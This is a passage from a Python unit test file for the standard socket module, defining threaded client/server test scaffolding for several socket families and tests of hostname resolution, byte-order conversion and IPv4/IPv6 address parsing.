self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = threading_helper.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(os_helper.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = (
l_bad_values +
[_testcapi.INT_MIN-1, _testcapi.INT_MAX+1] +
[1 << 16, _testcapi.INT_MAX]
)
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
